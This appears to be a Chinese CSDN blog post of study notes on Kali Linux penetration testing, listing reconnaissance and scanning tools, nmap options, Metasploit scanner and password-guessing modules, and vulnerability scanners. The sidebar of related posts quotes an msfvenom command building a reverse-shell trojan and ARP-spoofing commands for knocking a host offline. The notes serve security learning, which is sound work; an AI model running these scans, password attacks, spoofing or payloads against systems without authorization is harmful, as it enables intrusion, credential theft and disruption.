kali渗透测试与教学笔记1

最新推荐文章于 2022-09-13 23:49:43 发布
最新推荐文章于 2022-09-13 23:49:43 发布
阅读量235 收藏 1
点赞数
分类专栏: kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/105459063
版权

信息情报收集:

外围信息收集

whois、dnsenum、fierce、nslookup、dig

https://searchdns.netcraft.com/

https://www.ip-adress.com/

https://www.ip-adress.com/reverse-ip-lookup

https://www.maxmind.com/

http://www.7c.com/

探索网站目录结构:dirb、nikto、dirbuster

msfconsole里的brute_dirs、dir_listing、dir_scanner等辅助模块

搜索网站的email:metasploit的search_email_collector模块

traceroute命令对路由进行跟踪

metasploit局域网主机发现模块:arp_sweep、udp_sweep

nmap命令比较好用,netdiscover

nmap参数:-sV -O -p- -A -v -T

-PU:对开放的UDP端口进行存活主机探测

-Pn:不要使用ping扫描,因为互联网上的ICMP数据包会被防火墙过滤掉

-sn:仅探测存活主机,不探测tcp端口,一般用于主机在线扫描

metasploit的端口扫描模块:search portscan,会有ACK、ftpbounce、syn、tcp(最准)、xmas

一般情况推荐syn,结果准确,且不易察觉

nmap在端口扫描的参数:

-sT:tcp扫描

-sS:syn扫描

-sP:ping扫描

-sU:UDP端口

-sA:ack扫描

--open           仅仅显示开启的端口

--reason        显示端口处于特殊状态

-                 不进行dns解析操作   (本地搭建环境,不用dns解析)

服务扫描与查点:

通常在auxiliary下,service_name_version探测服务版本、service_name_login探测口令

口令探测:

ssh_login类似的,设置好usename、pass_file

psnuffle:唯一口令嗅探,可以截获常见协议身份认证过程。直接run

网络漏洞扫描:

openvas、nessus、owasp-zap、acunetix

nessus需要单独下载安装,在/opt/目录下安装

使用postgresql数据库开展msfconsole:

nmap -sV -O -v -n -oX demo.xml IP地址

利用nmap查找特点漏洞:(在msf中)

nmap -P0 --script=smb-check-vulns IP地址

进入msfconsole后,开启一个workspace -a demo1,db_import demo.xml,导入nmap扫描结果

注意一下是BT5的描述,慎用。 

metasploit中使用postgresql

msfupdate升级metasploit,再使用数据库

在msf中,

dnmap的功能与nmap一致

load openvas 载入openvas插件

 

 

 

花纵酒
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kaliWEB渗透笔记
fhl5203的博客
11-01 5150
抓包协议分析 一般每300M分成一个包,这样抓包分析工具打开速度不会太慢。 首先剔除对分析没有用处的协议,剔除IP地址是224以上的组播地址。 WEB攻击面 Network、OS、WEB Server、App server、Web Application、Database、Browser 重要的header • Set-Cookie:服务器发给客户端的SessionlD (被窃取的风险) • Co...
kali内网渗透学习笔记
goodhu的博客
03-09 2021
kali内网渗透学习笔记 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=33333 -f exe x> /root/桌面/test1.exe LHOST是主机ip ,LPORT是自己设置的端口号 使用msfconsole监听木马(依次输入下列命令) use exp...
kali linux web渗透测试学习笔记
花米徐xl_lx的专栏
10-31 3484
kali linux web渗透测试学习笔记 metasploit使用方法: 启动: 第一步:启用Postgresql服务。service postgresql start 第二步:启用metasploit服务。service matasploit start 第三步:启动框架。msfconsole 一个ASP站点的sql注入 测试数字型注入点
学习Kali渗透测试笔记
m0_51418771的博客
09-13 1934
学习笔记
Kali Linux入门第二课 | 一次简单的渗透笔记
热门推荐
DYBOY-程序开发&网络安全
09-22 1万+
下面是最近的一次简单的渗透攻击具体思路,涉及到2个系统服务攻击,记住一步一步的看,虽然很多人都像我一样对直接入侵电脑感兴趣,但是他的前期是枯燥无味,不过一定要一步一步的看完,因为通往权限的路,很艰难。MS12这个漏洞呢你可以通过msfconsole来进 行渗透,我就说折磨多了,你们自己看吧,虽然不是教程不过很详细,很容易懂。QQ:1099718640不懂得来问我 此教程仅为菜鸟,小白,入门提供
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
Kali 渗透测试 pdf
04-08
Kali 渗透测试 pdf
基于Kali Linux的渗透测试.pdf
09-06
渗透测试的方法有很多,在行业内被广泛采纳的有:ISSAF(信息系统安全评估架构)、NIST800-115(信息安全测试与评估技术指南)、OWASP(开放式 WEB 应用安全)、PTES(渗透测试执行标准)、OSSTMM(开源安全测试方法...
Kali Linux渗透测试技术详解
最新发布
02-19
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
KALi 渗透测试
09-13
通过kali系统详细的介绍渗透测试过程,通过工具渗透,带来渗透测试思路
kali渗透-信息收集
Brucye
05-31 1164
nping -S (所修改的源地址)- -icmp -c(数量) 目的地址。-c ping的次数,windows默认4次,Linux默认是无限ping。-t windows下表示无限ping, linux表示设置ttl值。-g:通过指定起始地址与终止地址产生目标列表。-p:目标端口,你可以指定任意端口。-c 设置arping的次数。-u:只显示不存活主机。-c:发送数据包的个数。-d:每个数据包的大小。-S:发送SYN数据包。-a:只显示存活主机。
Metasploit 实战第2章 第一节
安全参透之旅
11-13 3878
MetaSploit 第2章 实战 -----------------------------nslookup命令使用------------------------------------- root@kali:~# nslookup  > set type=A ---对其IP进行解析 > WWW.BAIDU.COM ---输入解析www.baidu.com域名地址 Serve
【安全牛学习笔记Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1607
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
Kali进行web渗透笔记(四)
小勇的博客
06-12 2901
Major Flaws in Web Applicaitons Client-side flaws are targeted flaws and exploit the client-side technologies such as AJAX JSON,and flash code to extract information from the client. Directory browsing
kali-简单渗透笔记
weixin_30750335的博客
01-12 2586
端口扫描 nmap -sS 目标ipArp 内网断网Arpspoof -i 网卡 -t 目标ip 网关获取网卡/网关ifconfig获取内网ipfping -asg 192.168.1.0/24Arp 欺骗echo 写命令,是不会有回显的ehco 1 >proc/sys/net/ipv4/ip_forward# 进行IP流量转发目标 --》 我的网卡 --》网关driftnet --&gt...
我的渗透笔记kali基本操作
xf555er的博客
03-12 952
一、虚拟机安装VMtools 1、安装vmtools软件 2、文件解压,用到tar zvxf命令 3、进入解压后的文件夹,然后运行安装文件,安装一直点默认就可以了(一直按回车键) 二、kali更新源的修改 阿里的更新源: #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src htt...
kali中使用msf进行信息收集的几种主要方式
weixin_43894771的博客
03-08 590
基于tcp协议收集 1.利用tcp做信息收集 use auxiliary/scanner/discovery/arp_sweep 设置相关属性 rhosts:目标ip therads:线程数 2.半连接方式扫描停tcp接口 use auxiliary/scanner/portscan/syn 设置相关属性 rhosts therads 3.执行密码嗅探 search psnuffle use ...
【安全牛学习笔记Kali Linux***测试介绍
weixin_34235371的博客
09-06 459
Kali Linux***测试介绍 安全问题的根源 优点:分工明确,工作效率高。 缺点:从业人员对系统没有整体的认识,对安全认识较为片面。 最大威胁是人,人都会犯错,安全问题不能100%绝对根除。 安全目标 先于***者发现和防止漏洞出现 ***型:以***者的思维发现漏洞、***系统。 ...
Kali Linux与BackTrack渗透测试实战指南
"《渗透测试类书籍》是关于Kali Linux系统渗透测试的一本教程,主要探讨了如何利用BackTrack和Kali Linux进行有效的漏洞诊断和渗透测试。这本书结合作者的实际经验,详细介绍了渗透测试的各个方面,同时关注了攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值